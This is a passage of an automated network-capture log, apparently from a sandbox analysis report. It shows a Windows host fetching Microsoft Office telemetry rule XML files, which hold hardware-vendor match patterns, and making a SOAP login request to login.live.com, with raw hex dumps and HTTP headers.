                                                                                                                                            x-azure-ref: 20241031T161302Z-16849878b78smng4k6nq15r6s40000000bag00000000740y
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            29192.168.2.44978540.126.32.133443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                            Content-Length: 4775
                                                                                                                                            Host: login.live.com
                                                                                                                                            2024-10-31 16:13:03 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                            2024-10-31 16:13:03 UTC569INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                            Expires: Thu, 31 Oct 2024 16:12:03 GMT
                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                            x-ms-route-info: C504_BAY
                                                                                                                                            x-ms-request-id: 7b245636-f99a-4397-b48a-bf62f75aafc2
                                                                                                                                            PPServer: PPV: 30 H: PH1PEPF00011F4B V: 0
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:02 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 11412
                                                                                                                                            2024-10-31 16:13:03 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            30192.168.2.44978613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:03 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 469
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                            x-ms-request-id: 89d7e9f4-d01e-0066-46a8-2aea17000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161303Z-15b8d89586flspj6y6m5fk442w0000000fpg00000000cszv
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:03 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            31192.168.2.44978713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:03 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 415
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                            x-ms-request-id: f6a97644-d01e-0017-2411-2bb035000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161303Z-15b8d89586fqj7k5h9gbd8vs980000000b000000000065vd
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            32192.168.2.44978813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:03 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 477
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                            x-ms-request-id: 360ad152-001e-0079-6bbd-2a12e8000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161303Z-17c5cb586f6fqqst87nqkbsx1c000000089g000000005tau
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:03 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            33192.168.2.44978913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:03 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 464
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                            x-ms-request-id: fc173041-601e-0097-79ad-24f33a000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161303Z-15b8d89586f5s5nz3ffrgxn5ac0000000adg00000000ggzc
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:03 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            34192.168.2.44979013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:03 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 494
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                            x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161303Z-16849878b78qfbkc5yywmsbg0c00000009fg00000000703g
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:03 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            35192.168.2.44979113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:03 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 419
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                            x-ms-request-id: 134a0630-601e-0084-685d-2a6b3f000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161303Z-159b85dff8fdjprfhC1DFWuqh000000000mg00000000a2k8
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            36192.168.2.44979213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 472
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                            x-ms-request-id: 48d00a26-901e-007b-7d77-2aac50000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-159b85dff8f5bl2qhC1DFWs6cn00000001r0000000009nrm
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:04 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            37192.168.2.44979413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:03 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 468
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                            x-ms-request-id: de33ccc9-c01e-008e-25fe-267381000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-16849878b786fl7gm2qg4r5y7000000009y000000000twzb
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
